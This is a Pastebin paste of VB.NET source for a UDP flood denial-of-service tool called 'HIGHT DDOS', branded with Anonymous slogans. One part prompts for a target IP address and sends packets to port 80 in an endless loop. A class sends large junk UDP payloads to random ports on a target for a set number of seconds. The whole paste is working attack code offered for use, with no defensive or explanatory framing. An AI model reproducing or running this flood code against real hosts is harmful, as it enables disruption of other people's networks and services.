Advertisement
Guest User

DDOS VB

a guest
Jul 7th, 2015
3,391
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.57 KB | None | 0 0
  1. MODULO ===================================================
  2.  
  3. Imports System.Net
  4. Imports System.Net.Sockets
  5. Module Module1
  6. Sub Main()
  7. Dim IP As String
  8. Dim Port As Integer = 80
  9. Dim sentt As Integer
  10. Dim synthesizer = CreateObject("SAPI.spvoice")
  11. Console.SetWindowSize(70, 25)
  12. Console.Title = "HIGHT DDOS ATACK"
  13. Console.ForegroundColor = ConsoleColor.Green
  14. Console.WriteLine("HIGHT DDOS CREATED BY POWERTECH")
  15. Console.ForegroundColor = ConsoleColor.Red
  16. Console.WriteLine("We are Anonymous.")
  17. Console.WriteLine("We are Legion.")
  18. Console.WriteLine("We do not forgive. ")
  19. Console.WriteLine("We do not forget. ")
  20. Console.WriteLine("Expect us.")
  21. Console.ForegroundColor = ConsoleColor.Yellow
  22. Console.WriteLine(" ")
  23. Console.WriteLine("HIGHT DDOS V 0.1")
  24. Console.WriteLine(" ")
  25. Console.WriteLine(" ")
  26. Console.ForegroundColor = ConsoleColor.Cyan
  27. Console.WriteLine("XAT.COM Name = zPowerTech")
  28. synthesizer.Speak(" Welcome to HIGHT DDOS ")
  29. Console.ForegroundColor = ConsoleColor.Green
  30. Console.WriteLine(" ")
  31. Console.WriteLine("____________________________")
  32. Console.Write("IP ADRESS YOUR SITE : ")
  33. IP = Console.ReadLine
  34. Dim remoteEP As New IPEndPoint(IPAddress.Parse(IP), Port)
  35. Dim buffer As Byte() = New Byte(&H1000 - 1) {}
  36. Dim socket As New Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp)
  37. Console.ForegroundColor = ConsoleColor.Blue
  38. Console.WriteLine("****************************************************************************")
  39. Console.WriteLine(String.Concat(New Object() {"Attacking to : ", IP, ":", Port, " - ", DateTime.Now.ToString("MM/dd/yyyy h:mm tt")}))
  40. Console.WriteLine("****************************************************************************")
  41. Console.WriteLine("Press Any Key To Continue...")
  42. Console.ReadLine()
  43. Console.ForegroundColor = ConsoleColor.Red
  44. Do While True
  45. sentt += 1
  46. Console.WriteLine(("Sending : " & sentt & " Packets"))
  47. socket.SendTo(buffer, remoteEP)
  48. Threading.Thread.Sleep(&H2D)
  49. Loop
  50. End Sub
  51.  
  52. End Module
  53.  
  54. FIM MODULO ======================================================================================================
  55.  
  56. cLASSE-------------------------------------------------------------------------------------------------
  57.  
  58. Imports System.Text
  59. Imports System.Net.Sockets
  60. Imports System.Net
  61.  
  62. Public Class Class1
  63.  
  64. Private Delegate Sub Send(ByVal IP$, ByVal Port As Integer, ByVal Data$)
  65. Private S As New Send(AddressOf _S)
  66.  
  67. Public Sub Flood(ByVal IP$, ByVal Seconds As Integer)
  68. Dim Later As Date = Now.AddSeconds(Seconds)
  69. Dim RandomData$ = String.Empty
  70. Dim I As Integer = 0
  71. Do Until I > 65500
  72. RandomData &= "X"
  73. I += 1
  74. Loop
  75. Do
  76. If Now > Later Then Exit Sub
  77. Randomize()
  78. S = New Send(AddressOf _S)
  79. S(IP, CInt(Math.Ceiling(Rnd() * 65500)), RandomData)
  80. Loop
  81. End Sub
  82.  
  83. Private Sub _S(ByVal IP$, ByVal Port As Integer, ByVal Data$)
  84. Using Client As New UdpClient
  85. With Client
  86. .Connect(IPAddress.Parse(IP), Port)
  87. .Send(Encoding.ASCII.GetBytes(Data), Encoding.ASCII.GetBytes(Data).Length)
  88. End With
  89. End Using
  90. End Sub
  91.  
  92. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement